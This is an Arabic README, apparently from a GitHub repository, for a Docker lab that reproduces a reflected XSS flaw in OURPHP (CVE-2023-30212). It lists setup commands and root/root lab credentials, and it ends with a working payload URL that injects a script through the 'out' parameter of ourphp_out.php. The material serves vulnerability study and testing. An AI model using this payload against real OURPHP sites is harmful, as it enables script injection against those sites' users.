
يحتوي هذا على الملفات اللازمة و Docker لإعادة إنتاج ثغرة أمنية في OURPHP تحتوي على ثغرة XSS (CVE-2023-30212)
يحتوي هذا على المجلدات الضرورية وملف Dockerfile لإعادة إنتاج ثغرة في OURPHP وهي ثغرة XSS (CVE-2023-30212).
المتطلبات الأساسية
قم بتنزيل Docker
sudo apt install -y docker.io
قم بتنزيل الملفات من هذا المستودع باستخدام git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
يحتوي هذا على المجلدات الضرورية وملف dockerfile لإعادة إنتاج السيناريو.
بعد تنزيل الملفات، قم ببناء صورة Docker باستخدام
sudo docker build -t <Give_Suitable_Docker_name> . .
! أضف اسمًا لصورة Docker حتى يمكن استدعاؤها لاحقًا.
قم بتحويل صورة Docker إلى حاوية باستخدام
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! هنا يتم ربط منفذ الحاوية بالمنفذ 80.
لعرض حالة حاوية Docker،
sudo docker ps
بعد تنفيذ هذه الخطوات،
قم بالدخول إلى localhost وقم بتهيئة OURPHP ببيانات الدخول التالية. اسم المستخدم: root كلمة المرور: root اسم قاعدة البيانات: data
الآن تحتاج إلى تكوين اسم المستخدم وكلمة المرور للمسؤول. قم بتعيين ما يلي: اسم المستخدم: root كلمة المرور: root ثم تابع
إذن الحمولة (payload) هي
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
أضف هذا مع localhost أو 127.0.0.1 لتشغيل XSS.